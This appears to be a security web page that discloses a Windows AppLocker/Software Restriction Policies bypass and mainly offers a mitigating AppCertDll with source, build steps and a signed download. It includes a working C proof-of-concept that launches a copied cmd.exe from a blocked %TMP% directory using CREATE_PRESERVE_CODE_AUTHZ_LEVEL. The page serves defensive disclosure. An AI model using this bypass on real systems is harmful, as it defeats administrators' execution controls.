
Me, myself & IT

Prevent Bypass of AppLocker and SAFER alias Software Restriction Policies

Purpose
Reason
Demonstration
Mitigation
Source and Build Instructions
Implementation and Build Details
Authenticity and Integrity
Download
Installation
Automatic online installation
Manual offline installation
Update
Deinstallation

Purpose

APPCERT.DLL evaluates the SAFER security level of every application to be started by the Win32 functions CreateProcess(), CreateProcessAsUser(), CreateProcessWithLogonW() and CreateProcessWithTokenW(): it allows process creation for the security levels SAFER_LEVELID_FULLYTRUSTED alias Unrestricted and SAFER_LEVELID_NORMALUSER alias Basic User, or denies process creation for the security levels SAFER_LEVELID_CONSTRAINED alias Restricted, SAFER_LEVELID_UNTRUSTED alias Untrusted and SAFER_LEVELID_DISALLOWED alias Disallowed.

In case of denial it writes an entry with event ID 865, 866, 867, 868 or 882 from source Software Restriction Policies (on Windows XP and Windows Server 2003) or Microsoft-Windows-SoftwareRestrictionPolicies (on Windows Vista® and newer versions of Windows NT) to the Event Log.

Reason

The process creation flag CREATE_PRESERVE_CODE_AUTHZ_LEVEL of the Win32 functions CreateProcess(), CreateProcessAsUser(), CreateProcessWithLogonW() and CreateProcessWithTokenW() allows unprivileged users to bypass both AppLocker and SAFER alias Software Restriction Policies in all versions of Windows NT:
CREATE_PRESERVE_CODE_AUTHZ_LEVEL (0x02000000): Allows the caller to execute a child process that bypasses the process restrictions that would normally be applied automatically to the process.

This bypass may also be exercised indirectly: the flag SAFER_TOKEN_MAKE_INERT of the Win32 function SaferComputeTokenFromLevel() allows creating an inert token which can then be (ab)used with the Win32 functions CreateProcessAsUser() and CreateProcessWithTokenW(); both Win32 functions, however, require their caller to hold privileges which are not assigned to unprivileged users.

Note: the flag LOAD_IGNORE_CODE_AUTHZ_LEVEL of the Win32 function LoadLibraryEx() and the flag SANDBOX_INERT of the Win32 function CreateRestrictedToken() enable this bypass too; both are, however, disabled for unprivileged users in Windows 8 and newer versions of Windows NT (in Windows 7 and Windows Server 2008 R2 with the hotfix 2532445, the hotfix 2894252, or the convenience rollup update 3125574).

Demonstration

Perform the following 5 simple steps to demonstrate the AppLocker and SAFER alias Software Restriction Policies bypass.
  1. Enable SAFER alias Software Restriction Policies and block execution in the user’s %TMP% directory per registry path rule, for example with the following Registry entries:

    REGEDIT4
    
    ; Copyright © 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
    "AuthentiCodeEnabled"=dword:00000000
    "DefaultLevel"=dword:00040000        ; 'Unrestricted'
    "PolicyScope"=dword:00000000         ; Apply to 'Users' and 'Administrators'
    "TransparentEnabled"=dword:00000002  ; Apply to executable files and DLLs
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{6B29FC40-CA47-1067-B31D-00DD010662DA}]
    "Description"="%TMP%"
    "ItemData"=hex(2):25,48,4b,45,59,5f,43,55,52,52,45,4e,54,5f,55,53,45,52,5c,45,6e,76,69,72,6f,6e,6d,65,6e,74,5c,54,4d,50,25,00
    ;"ItemData"=expand:"%HKEY_CURRENT_USER\\Environment\\TMP%"
  2. Copy the Command Processor %COMSPEC% into your %TMP% directory and verify that execution is blocked there:

    COPY "%COMSPEC%" "%TMP%"
    "%TMP%\Cmd.exe"
    RENAME "%TMP%\Cmd.exe" cmd12345.tmp
    "%TMP%\cmd12345.tmp"
    "%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

            1 file(s) copied.
    This program is blocked by group policy. For more information, contact your system administrator.
    This program is blocked by group policy. For more information, contact your system administrator.
    0x4ec (WIN32: 1260 ERROR_ACCESS_DISABLED_BY_POLICY) -- 1260 (1260)
    Error message text: This program is blocked by group policy. For more information, contact your system administrator.
    CertUtil: -error command completed successfully.
  3. Create the text file APPCERT.C with the following content in an arbitrary, preferably empty directory:

    // Copyright © 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>
    
    #define STRICT
    #define UNICODE
    #define WIN32_LEAN_AND_MEAN
    
    #include <windows.h>
    
    __declspec(safebuffers)
    BOOL	CDECL	PrintConsole(HANDLE hConsole, [SA_FormatString(Style="printf")] LPCWSTR lpFormat, ...)
    {
    	WCHAR	szOutput[1024];
    	DWORD	dwOutput;
    	DWORD	dwConsole;
    
    	va_list	vaInput;
    	va_start(vaInput, lpFormat);
    
    	dwOutput = wvsprintf(szOutput, lpFormat, vaInput);
    
    	va_end(vaInput);
    
    	if (dwOutput == 0)
    		return FALSE;
    
    	if (!WriteConsole(hConsole, szOutput, dwOutput, &dwConsole, NULL))
    		return FALSE;
    
    	return dwConsole == dwOutput;
    }
    
    const	STARTUPINFO	si = {sizeof(si)};
    
    __declspec(noreturn)
    VOID	CDECL	wmainCRTStartup(VOID)
    {
    	PROCESS_INFORMATION pi;
    
    	WCHAR	szSource[MAX_PATH];
    	DWORD	dwSource;
    	WCHAR	szBuffer[MAX_PATH];
    	DWORD	dwBuffer;
    	DWORD	dwError = ERROR_SUCCESS;
    	HANDLE	hConsole = GetStdHandle(STD_ERROR_HANDLE);
    
    	if (hConsole == INVALID_HANDLE_VALUE)
    		dwError = GetLastError();
    	else
    	{
    		dwSource = GetEnvironmentVariable(L"COMSPEC", szSource, sizeof(szSource) / sizeof(*szSource));
    
    		if (dwSource == 0)
    			PrintConsole(hConsole,
    			             L"GetEnvironmentVariable() returned error %lu\n",
    			             dwError = GetLastError());
    		else
    		{
    			dwBuffer = GetTempPath(sizeof(szBuffer) / sizeof(*szBuffer), szBuffer);
    
    			if (dwBuffer == 0)
    				PrintConsole(hConsole,
    				             L"GetTempPath() returned error %lu\n",
    				             dwError = GetLastError());
    			else
    			{
    				if (GetTempFileName(szBuffer, L"cmd", 0, szBuffer) == 0)
    					PrintConsole(hConsole,
    					             L"GetTempFileName() returned error %lu\n",
    					             dwError = GetLastError());
    				else
    				{
    					if (!CopyFile(szSource, szBuffer, FALSE))
    						PrintConsole(hConsole,
    						             L"CopyFile() returned error %lu\n",
    						             dwError = GetLastError());
    					else
    					{
    						if (!CreateProcess(szBuffer,
    						                   L"CMD.EXE /D /K SET \"\"",
    						                   (LPSECURITY_ATTRIBUTES) NULL,
    						                   (LPSECURITY_ATTRIBUTES) NULL,
    						                   FALSE,
    						                   CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_PRESERVE_CODE_AUTHZ_LEVEL | CREATE_UNICODE_ENVIRONMENT,
    						                   L"",
    						                   (LPCWSTR) NULL,
    						                   &si,
    						                   &pi))
    							PrintConsole(hConsole,
    							             L"CreateProcess() returned error %lu\n",
    							             dwError = GetLastError());
    						else
    						{
    							PrintConsole(hConsole,
    							             L"Process %lu with primary thread %lu started from file \'%ls\'\n",
    							             pi.dwProcessId, pi.dwThreadId, szBuffer);
    
    							if (!CloseHandle(pi.hThread))
    								PrintConsole(hConsole,
    								             L"CloseHandle() returned error %lu\n",
    								             dwError = GetLastError());
    
    							if (!CloseHandle(pi.hProcess))
    								PrintConsole(hConsole,
    								             L"CloseHandle() returned error %lu\n",
    								             dwError = GetLastError());
    						}
    					}
    
    					if (!DeleteFile(szBuffer))
    						PrintConsole(hConsole,
    						             L"DeleteFile() returned error %lu\n",
    						             dwError = GetLastError());
    				}
    			}
    		}
    	}
    
    	ExitProcess(dwError);
    }
  4. Run the following four command lines to build the console application APPCERT.EXE from the source file APPCERT.C created in step 3. and clean up afterwards:

    SET CL=/GA /GF /GS /Gd /Gy /O2 /Os /Oy /W4 /we4013 /Zl
    SET LINK=/EMITTOOLVERSIONINFO:NO /ENTRY:wmainCRTStartup /LARGEADDRESSAWARE /NOCOFFGRPINFO /NODEFAULTLIB /OPT:REF /OSVERSION:5.1 /RELEASE /SUBSYSTEM:CONSOLE /VERSION:0.815
    CL.EXE APPCERT.C KERNEL32.LIB USER32.LIB
    ERASE APPCERT.OBJ

    For details and reference see the MSDN articles Compiler Options and Linker Options.

    Note: if necessary, see the MSDN article Use the Microsoft C++ toolset from the command line for an introduction.

    Note: APPCERT.EXE is a pure Win32 console application and builds without the MSVCRT libraries.

    Note: the command lines can be copied and pasted as block into a Command Processor window.

    Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.40219.01 for 80x86
    Copyright (C) Microsoft Corporation.  All rights reserved.
    
    APPCERT.C
    APPCERT.C(86) : warning C4090: 'function' : different 'const' qualifiers
    
    Microsoft (R) Incremental Linker Version 10.00.40219.386
    Copyright (C) Microsoft Corporation.  All rights reserved.
    
    …
  5. Execute the console application APPCERT.EXE built in step 4.: the copy of the Command Processor starts from the %TMP% directory despite the blocking SAFER registry path rule!

Mitigation

AppCertDlls are loaded during the first call of one of the Win32 functions CreateProcess(), CreateProcessAsUser(), CreateProcessWithLogonW() and CreateProcessWithTokenW() in every (user) process; their CreateProcessNotify() routine is called with PROCESS_CREATION_QUERY as reason whenever an application is to be started.
If one of the AppCertDlls returns a negative NTSTATUS like 0xC0000372 alias STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY, process creation is denied and the Win32 functions CreateProcess*() yield an error code like 786 alias ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY; process creation is allowed only if all AppCertDlls return a non-negative NTSTATUS like 0x00000000 alias STATUS_SUCCESS.

Caveat: the NTSTATUS 0xC0000372 alias STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY was chosen deliberately to avoid possible problems in non-interactive processes: as its name implies, it instructs its receiver to deny access without displaying an error message.

Note: the APPCERT.DLL offered for download uses the other NTSTATUS codes to let its caller(s) display error messages.

Note: AppCertDlls are not documented by Microsoft®!

Note: Windows 11, where Services.exe and WinInit.exe execute as Protected Process Lite, writes an error message with event id 3033 plus an information message with event id 3089 and source Microsoft-Windows-CodeIntegrity to the Microsoft-Windows-CodeIntegrity/Operational event log.

Source and Build Instructions

Perform the following 4 simple steps to build APPCERT.DLL from the source and install it.
  1. Create the text file APPCERT.C with the following content in an arbitrary, preferably empty directory:

    // Copyright © 2004-2025, Stefan Kanthak <stefan.kanthak@nexgo.de>
    
    #define STRICT
    #define UNICODE
    #define WIN32_LEAN_AND_MEAN
    
    #define WINVER		0x0500
    #define _WIN32_WINNT	0x0500
    
    #include <windows.h>
    #include <winsafer.h>
    #include <wintrust.h>
    
    typedef	enum	_REASON
    {
    	PROCESS_CREATION_QUERY   = 1,
    	PROCESS_CREATION_ALLOWED = 2,
    	PROCESS_CREATION_DENIED  = 3
    } REASON;
    
    // see <https://msdn.microsoft.com/en-us/library/cc231200.aspx>
    // and <https://msdn.microsoft.com/en-us/library/cc704588.aspx>
    
    typedef	enum	_NTSTATUS
    {
    	STATUS_SUCCESS                               = 0x00000000,
    	STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT     = 0xC0000361,
    	STATUS_ACCESS_DISABLED_BY_POLICY_PATH        = 0xC0000362,
    	STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER   = 0xC0000363,
    	STATUS_ACCESS_DISABLED_BY_POLICY_OTHER       = 0xC0000364,
    	STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0xC0000372
    } NTSTATUS;
    
    __declspec(safebuffers)
    NTSTATUS	NTAPI	CreateProcessNotify(LPCWSTR lpApplicationName, REASON enReason)
    {
    	NTSTATUS	ntStatus = STATUS_SUCCESS;
    
    	// see <https://msdn.microsoft.com/en-us/library/ms722431.aspx>
    
    	SAFER_CODE_PROPERTIES	scp = {sizeof(scp),
    				       SAFER_CRITERIA_AUTHENTICODE | SAFER_CRITERIA_IMAGEHASH | SAFER_CRITERIA_IMAGEPATH,
    				       (LPCWSTR) NULL,
    				       (HANDLE) NULL,
    				       0,
    				       {0},
    				       0,
    				       {0, 0},
    				       (ALG_ID) 0,
    				       (LPBYTE) NULL,
    				       HWND_DESKTOP,
    				       WTD_UI_NONE};
    
    	SAFER_LEVEL_HANDLE	slh;
    
    	DWORD	dwLevelId;
    	DWORD	dwDummy;
    
    	switch (enReason)
    	{
    	case PROCESS_CREATION_QUERY:
    
    		// called once for each process that is to be created:
    		// return STATUS_SUCCESS to allow process creation or
    		// return STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY to deny process creation
    
    		scp.ImagePath = lpApplicationName;
    
    		// see <https://msdn.microsoft.com/en-us/library/ms722428.aspx>
    
    		if (!SaferIdentifyLevel(1, &scp, &slh, NULL))
    			OutputDebugStringA("AppCert!CreateProcessNotify: SaferIdentifyLevel() failed!\n");
    		else
    		{	// see <https://msdn.microsoft.com/en-us/library/ms722426.aspx>
    
    			if (!SaferGetLevelInformation(slh, SaferObjectLevelId, &dwLevelId, sizeof(dwLevelId), &dwDummy))
    				OutputDebugStringA("AppCert!CreateProcessNotify: SaferGetLevelInformation() failed!\n");
    			else
    				// see <https://msdn.microsoft.com/en-us/library/ms722425.aspx>
    
    				if (dwLevelId < SAFER_LEVELID_NORMALUSER)
    				{
    					ntStatus = STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY;
    
    					// see <https://msdn.microsoft.com/en-us/library/ms722430.aspx>
    
    					if (!SaferRecordEventLogEntry(slh, scp.ImagePath, NULL))
    						OutputDebugStringA("AppCert!CreateProcessNotify: SaferRecordEventLogEntry() failed!\n");
    				}
    
    			// see <https://msdn.microsoft.com/en-us/library/ms722423.aspx>
    
    			if (!SaferCloseLevel(slh))
    				OutputDebugStringA("AppCert!CreateProcessNotify: SaferCloseLevel() failed!\n");
    		}
    
    		break;
    
    	case PROCESS_CREATION_ALLOWED:
    
    		// called once for each process that is allowed creation;
    		// the return value is discarded
    
    	//	…
    
    		break;
    
    	case PROCESS_CREATION_DENIED:
    
    		// called once for each process that is denied creation;
    		// the return value is discarded
    
    	//	…
    
    		break;
    
    	default:
    		;
    	}
    
    	// the return value is only used for PROCESS_CREATION_QUERY,
    	// and discarded for all other reasons
    
    	return ntStatus;
    }
  2. Run the following four command lines to build the DLL APPCERT.DLL from the source file APPCERT.C created in step 1. and clean up afterwards:

    SET CL=/GA /GF /GS /Gd /Gy /O1 /Os /Oy- /W4 /we4013 /Zl
    SET LINK= /DLL /EXPORT:CreateProcessNotify /LARGEADDRESSAWARE /NOCOFFGRPINFO /NODEFAULTLIB /NOENTRY /OPT:REF /OSVERSION:5.1 /RELEASE /SUBSYSTEM:WINDOWS /VERSION:0.815
    CL.EXE APPCERT.C ADVAPI32.LIB KERNEL32.LIB
    ERASE APPCERT.EXP APPCERT.LIB APPCERT.OBJ

    For details and reference see the MSDN articles Compiler Options and Linker Options.

    Note: if necessary, see the MSDN article Use the Microsoft C++ toolset from the command line for an introduction.

    Note: APPCERT.DLL is a pure Win32 DLL and builds without the MSVCRT libraries.

    Note: the command lines can be copied and pasted as block into a Command Processor window.

    Microsoft (R) C/C++ Optimizing Compiler Version 16.00.40219.01 for x64
    Copyright (C) Microsoft Corporation.  All rights reserved.
    
    APPCERT.C
    
    Microsoft (R) Incremental Linker Version 10.00.40219.386
    Copyright (C) Microsoft Corporation.  All rights reserved.
    
       Creating library APPCERT.lib and object APPCERT.exp
    …

    Note: for systems with AMD64 alias x64 processor architecture, build APPCERT.DLL for the I386 alias x86 processor architecture too!

    Microsoft (R) C/C++ Optimizing Compiler Version 16.00.40219.01 for 80x86
    Copyright (C) Microsoft Corporation.  All rights reserved.
    
    APPCERT.C
    
    Microsoft (R) Incremental Linker Version 10.00.40219.386
    Copyright (C) Microsoft Corporation.  All rights reserved.
    
       Creating library APPCERT.lib and object APPCERT.exp
    …
  3. Copy the DLL APPCERT.DLL built in step 2. into Windows’ system directory %SystemRoot%\System32\.

    Note: on systems with AMD64 alias x64 processor architecture, additionally copy APPCERT.DLL built for the I386 alias x86 processor architecture into the directory %SystemRoot%\SysWoW64\.

  4. Run the following command line to activate it:

    "%SystemRoot%\System32\Reg.exe" ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls" /V "AppCert.dll" /T REG_SZ /D "%SystemRoot%\System32\AppCert.dll" /F

Implementation and Build Details

APPCERT.DLL is a pure Win32 DLL, written in ANSI C, built with the Platform SDK for Windows Server 2003 R2 and the Microsoft Visual C++ Compiler 2010 SP1 from update 2519277, but without the MSVCRT libraries, for use on Windows XP and newer versions of Windows NT.

APPCERT.DLL is available for the I386 alias x86, AMD64 alias x64 and IA64 processor architectures of Windows NT.

Authenticity and Integrity

APPCERT.DLL and the cabinet file APPCERT.CAB are digitally signed using an X.509 certificate issued by WEB.DE TrustCenter E-Mail Certification Authority.
Serial number of the certificate: 0x0465CEF9 = 73780985
Fingerprint of the certificate:
MD5: 33 33 6e 1d 26 18 a7 c2 be 87 11 68 05 2c 70 09
SHA-1: 8c 5b 75 21 40 41 77 ac 54 13 13 02 06 6b b0 69 10 2e 83 0e
Download and install the CA and root X.509 certificates of WEB.DE to validate and verify the digital signature.

Note: unfortunately WEB.DE abandoned their trust center in 2018 and removed all pages and download links in 2019; fortunately the Wayback Machine archived the TrustCenter page, the CA and the root certificate.

Note: due to its counter signature alias timestamp the digital signature remains valid past the X.509 certificate's expiration date!

Download

AMD64\APPCERT.DLL, I386\APPCERT.DLL, IA64\APPCERT.DLL and the setup script APPCERT.INF are packaged in the (compressed and digitally signed) cabinet file APPCERT.CAB.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

X:\>EXTRACT.EXE /D APPCERT.CAB
Microsoft (R) Cabinet Extraction Tool - Version 5.1.2600.5512
Copyright (c) Microsoft Corporation. All rights reserved..

 Cabinet APPCERT.CAB

06-11-2018 10:07:18p A---        12,291 APPCERT.INF
06-11-2018 10:05:40p A---        31,960 AMD64\APPCERT.DLL
06-11-2018 10:05:30p A---        31,448 I386\APPCERT.DLL
06-11-2018 10:05:46p A---        35,544 IA64\APPCERT.DLL
                 4 Files        111,243 bytes

X:\>DIR APPCERT.CAB
 Volume in drive X has no label.
 Volume Serial Number is 1957-0427

 Directory of X:\

06/11/2018  10:08 PM            29,628 APPCERT.CAB
               1 File(s)         29,628 bytes
               0 Dir(s)    9,876,543,210 bytes free

X:\>SIGNTOOL.EXE Verify /V APPCERT.CAB

Verifying: APPCERT.CAB
SHA1 hash of file: (not calculated)
Signing Certificate Chain:
    Issued to: WEB.DE TrustCenter
    Issued by: WEB.DE TrustCenter
    Expires:   30.08.2024 09:49:34
    SHA1 hash: C8301016951187E6320569B3ED54F34845B51638

        Issued to: WEB.DE TrustCenter E-Mail Certification Authority
        Issued by: WEB.DE TrustCenter
        Expires:   30.08.2024 09:50:51
        SHA1 hash: 8946380C6E370988FB587257A9F9A5CD323045F0

            Issued to: Stefan Kanthak
            Issued by: WEB.DE TrustCenter E-Mail Certification Authority
            Expires:   15.12.2018 02:16:19
            SHA1 hash: 8C5B7521404177AC54131302066BB069102E830E

The signature is timestamped: 11.06.2018 22:08:12
Timestamp Verified by:
    Issued to: Thawte Timestamping CA
    Issued by: Thawte Timestamping CA
    Expires:   01.01.2021 01:59:59
    SHA1 hash: BE36A4562FB2EE05DBB3D32323ADF445084ED656

        Issued to: Symantec Time Stamping Services CA - G2
        Issued by: Thawte Timestamping CA
        Expires:   31.12.2020 01:59:59
        SHA1 hash: 6C07453FFDDA08B83707C09B82FB3D15F35336B1

            Issued to: Symantec Time Stamping Services Signer - G4
            Issued by: Symantec Time Stamping Services CA - G2
            Expires:   30.12.2020 01:59:59
            SHA1 hash: 65439929B67973EB192D6FF243E6767ADF0834E4

Successfully verified: APPCERT.CAB

Number of files successfully Verified: 1
Number of warnings: 0
Number of errors: 0

X:\>

On Windows Vista and newer versions of Windows NT, run the following command line to extract all files into the specified directory, preserving their paths:

    "%SystemRoot%\System32\Expand.exe" APPCERT.CAB /F:* "‹target directory›"

Note: Expand.exe from prior versions of Windows NT ignores the paths and junks them; use Extract.exe from the Support Tools on Windows XP and Windows Server 2003 instead!

Note: if you open APPCERT.CAB with Windows Explorer, switch to Details view and turn on the Path column!

Installation

Installation requires administrative privileges and access rights.

The setup script APPCERT.INF copies the appropriate APPCERT.DLL to %SystemRoot%\System32\APPCERT.DLL and creates the following Registry entry to activate it:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"AppCert.dll"="C:\\Windows\\System32\\AppCert.dll"

Caveat: this Registry entry is not preserved by the bi-annual feature updates or upgrades on Windows 10 and has to be restored afterwards!

Note: on systems with AMD64 alias x64 processor architecture, the installation must be run in the native (64-bit) execution environment to install APPCERT.DLL for both processor architectures!
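
Because the Registry entry can disappear after an update, the mitigation should be re-checked regularly. The following read-only PowerShell check is an added example, not part of the original page or the author's package: it verifies the AppCertDlls registration and the installed DLLs described in this section, and lists recent denial events with the event IDs named under Purpose. The 7-day window and all variable names are assumptions; the provider name applies to Windows Vista and newer versions of Windows NT.

```powershell
# Added example, not the author's code: read-only health check for the
# APPCERT.DLL mitigation. The 7-day window and variable names are assumptions.
$keyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls'
$valueName = 'AppCert.dll'                                # value name used on this page
$signer    = '8C5B7521404177AC54131302066BB069102E830E'   # SHA-1 fingerprint from this page
$eventIds  = 865, 866, 867, 868, 882                      # SAFER denial events from this page
$provider  = 'Microsoft-Windows-SoftwareRestrictionPolicies'

# WOW64 redirects System32 for 32-bit processes, so insist on the native shell.
if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
    throw 'Run this check from the native (64-bit) PowerShell.'
}

$problems = @()

# 1. Registration: the value is lost during Windows 10 feature updates.
$system32   = Join-Path $env:SystemRoot 'System32\AppCert.dll'
$key        = Get-Item -LiteralPath $keyPath -ErrorAction SilentlyContinue
$registered = if ($key) { $key.GetValue($valueName) } else { $null }
if (-not $registered) {
    $problems += "Registry value '$valueName' is missing: the DLL is not loaded."
}
elseif ([Environment]::ExpandEnvironmentVariables($registered) -ne $system32) {
    $problems += "Registry value '$valueName' points to unexpected file '$registered'."
}

# 2. Files: one DLL per execution environment, each with an intact signature.
$dlls = @($system32)
if ([Environment]::Is64BitOperatingSystem) {
    $dlls += Join-Path $env:SystemRoot 'SysWOW64\AppCert.dll'
}
$files = foreach ($dll in $dlls) {
    if (-not (Test-Path -LiteralPath $dll -PathType Leaf)) {
        $problems += "'$dll' is missing."
        continue
    }
    $sig   = Get-AuthenticodeSignature -FilePath $dll
    $thumb = if ($sig.SignerCertificate) { $sig.SignerCertificate.Thumbprint } else { $null }
    if ($sig.Status -eq 'HashMismatch') {
        $problems += "'$dll' was modified after signing."
    }
    elseif ($thumb -and $thumb -ne $signer) {
        $problems += "'$dll' is signed with unexpected certificate $thumb."
    }
    [pscustomobject]@{
        Path            = $dll
        SignatureStatus = $sig.Status   # NotSigned is normal for a self-built DLL
        SignedByAuthor  = ($thumb -eq $signer)
    }
}

# 3. Denials logged by SAFER (including APPCERT.DLL) during the last 7 days.
$denials = @(Get-WinEvent -FilterHashtable @{
        ProviderName = $provider
        Id           = $eventIds
        StartTime    = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue)

[pscustomobject]@{
    Healthy       = ($problems.Count -eq 0)
    Problems      = $problems
    Files         = @($files)
    RecentDenials = $denials | Select-Object TimeCreated, Id, Message
}
```

A `SignatureStatus` other than `Valid` for the downloaded DLLs is expected until the WEB.DE CA and root certificates are installed, as described under Authenticity and Integrity.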

Automatic online installation

When visited with Internet Explorer, this web page will prompt to install (the contents of) the package using Internet Component Download.

Note: on systems with AMD64 alias x64 processor architecture, Internet Explorer (x64) must be used!

Manual offline installation

Download the package APPCERT.CAB and verify its digital signature, then open it in Windows Explorer, extract its contents preserving the directory structure, right-click the extracted setup script APPCERT.INF to display its context menu and click Install to run the installation.

Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe, the application registered for the Install verb of *.inf files, requests administrative privileges.

Update

The setup script supports the update from any previous version: just install the current version!

Deinstallation

Deinstallation requires administrative privileges and access rights.

On Windows XP and Windows Server 2003, open the Add/Remove Programs applet of the Control Panel, tick the checkbox Updates, select the entry Prevent bypass of AppLocker and SAFER alias Software Restriction Policies underneath Systemkonfiguration and click the Remove button.

On Windows Vista and newer versions of Windows NT, open the Control Panel and click the entry View installed updates underneath the Programs and Features or Programs category.
In Installed Updates select the entry Prevent bypass of AppLocker and SAFER alias Software Restriction Policies underneath Systemkonfiguration and click the Uninstall menu entry.

Copyright © 1995–2025 • Stefan Kanthak • <stefan.kanthak@nexgo.de>